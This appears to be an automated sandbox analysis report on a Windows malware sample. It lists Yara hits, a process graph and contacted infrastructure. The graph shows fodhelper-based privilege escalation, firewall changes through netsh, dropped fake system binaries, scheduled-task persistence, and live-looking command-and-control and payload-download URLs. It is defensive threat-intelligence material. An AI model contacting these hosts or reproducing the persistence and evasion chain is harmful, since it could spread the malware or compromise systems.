Source: Yara match File source: 50.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.5040e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.4t4y4r89UZ.exe.5880000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.5040e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.4t4y4r89UZ.exe.58f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 519673 Sample: 4t4y4r89UZ Startdate: 11/11/2021 Architecture: WINDOWS Score: 100 94 Antivirus detection for URL or domain 2->94 96 Antivirus detection for dropped file 2->96 98 Multi AV Scanner detection for dropped file 2->98 100 10 other signatures 2->100 9 4t4y4r89UZ.exe 16 2->9         started        12 csrss.exe 2 2->12         started        14 svchost.exe 2->14         started        16 11 other processes 2->16 process3 signatures4 106 Detected unpacking (changes PE section rights) 9->106 108 Detected unpacking (overwrites its own PE header) 9->108 110 Modifies the windows firewall 9->110 112 Drops PE files with benign system names 9->112 18 4t4y4r89UZ.exe 11 2 9->18         started        22 cmd.exe 2 12->22         started        114 Changes security center settings (notifications, updates, antivirus, firewall) 14->114 24 cmd.exe 16->24         started        process5 file6 78 C:\Windows\rss\csrss.exe, PE32 18->78 dropped 102 Creates an autostart registry key pointing to binary in C:\Windows 18->102 26 csrss.exe 4 8 18->26         started        31 cmd.exe 1 18->31         started        33 fodhelper.exe 22->33         started        35 conhost.exe 22->35         started        37 fodhelper.exe 22->37         started        39 fodhelper.exe 22->39         started        41 conhost.exe 24->41         started        43 fodhelper.exe 24->43         started        45 fodhelper.exe 24->45         started        signatures7 process8 dnsIp9 88 runmodes.com 104.21.34.203, 443, 49747, 49749 CLOUDFLARENETUS United States 26->88 90 server8.trumops.com 104.21.79.9, 443, 49748, 49750 CLOUDFLARENETUS United States 26->90 92 7 other IPs or domains 26->92 80 C:\Windows\windefender.exe, PE32 26->80 dropped 82 C:\Users\user\AppData\Local\...\injector.exe, PE32+ 26->82 dropped 84 C:\Users\...84tQuerySystemInformationHook.dll, PE32+ 26->84 dropped 86 5 other files (none is malicious) 26->86 dropped 116 Multi AV Scanner detection for dropped file 26->116 118 Detected unpacking (changes PE section rights) 26->118 120 Detected unpacking (overwrites its own PE header) 26->120 126 3 other signatures 26->126 47 schtasks.exe 1 26->47         started        49 schtasks.exe 1 26->49         started        51 mountvol.exe 1 26->51         started        60 4 other processes 26->60 122 Uses netsh to modify the Windows network and firewall settings 31->122 53 netsh.exe 3 31->53         started        56 conhost.exe 31->56         started        124 Drops executables to the windows directory (C:\Windows) and starts them 33->124 58 csrss.exe 33->58         started        file10 signatures11 process12 signatures13 62 conhost.exe 47->62         started        64 conhost.exe 49->64         started        66 conhost.exe 51->66         started        104 Creates files in the system32 config directory 53->104 68 csrss.exe 56->68         started        70 conhost.exe 60->70         started        72 conhost.exe 60->72         started        74 conhost.exe 60->74         started        76 conhost.exe 60->76         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.139.144
 unknown United States
13335 CLOUDFLARENETUS false
104.21.34.203
 runmodes.com United States
13335 CLOUDFLARENETUS false
104.21.79.9
 server8.trumops.com United States
13335 CLOUDFLARENETUS false
172.67.207.136
 unknown United States
13335 CLOUDFLARENETUS false
172.67.196.11
 gohnot.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
runmodes.com 104.21.34.203 true
gohnot.com 172.67.196.11 true
server8.trumops.com 104.21.79.9 true
trumops.com unknown unknown
f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com unknown unknown
logs.trumops.com unknown unknown
e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe false
  • Avira URL Cloud: safe
 unknown
https://runmodes.com/api/log true
  • Avira URL Cloud: malware
 unknown
https://server8.trumops.com/api/poll false
  • Avira URL Cloud: safe
 unknown
https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae false
  • Avira URL Cloud: safe
 unknown
https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae false
  • Avira URL Cloud: safe
 unknown